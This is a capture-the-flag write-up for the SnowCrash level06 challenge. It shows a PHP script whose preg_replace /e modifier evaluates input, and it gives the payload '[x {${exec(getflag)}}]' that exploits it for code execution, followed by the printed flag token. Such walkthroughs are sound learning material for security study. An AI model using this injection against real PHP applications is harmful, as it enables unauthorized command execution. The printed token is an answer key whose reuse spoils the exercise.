# Level06

- There is a script and an executable in the home directory.
	The script executes the php script:
	```bash
	level06@SnowCrash:~$ strings ./level06 | grep php
	/usr/bin/php
	/home/user/level06/level06.php
	```
	```bash
	level06@SnowCrash:~$ cat level06.php
	#!/usr/bin/php
	<?php
	function y($m) { $m = preg_replace("/\./", " x ", $m); $m = preg_replace("/@/", " y", $m); return $m; }
	function x($y, $z) { $a = file_get_contents($y); $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); $a = preg_replace("/\[/", "(", $a); $a = preg_replace("/\]/", ")", $a); return $a; }
	$r = x($argv[1], $argv[2]); print $r;
	?>
	```
- By totally reading the script we can deduce that it executes a regex on a file:
	```php
	$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
	```
	Where the part of `[x ... ]` gets evaluated. Meaning we can exploit it.
- By creating a script we can interface
	```bash
	level06@SnowCrash:~$ chmod +rwx .
	level06@SnowCrash:~$ echo '[x {${exec(getflag)}}]' > exploit
	```
- And then you execute it:
	```bash
	level06@SnowCrash:~$ ./level06 exploit
	PHP Notice:  Use of undefined constant getflag - assumed 'getflag' in /home/user/level06/level06.php(4) : regexp code on line 1
	PHP Notice:  Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub in /home/user/level06/level06.php(4) : regexp code on line 1
	```
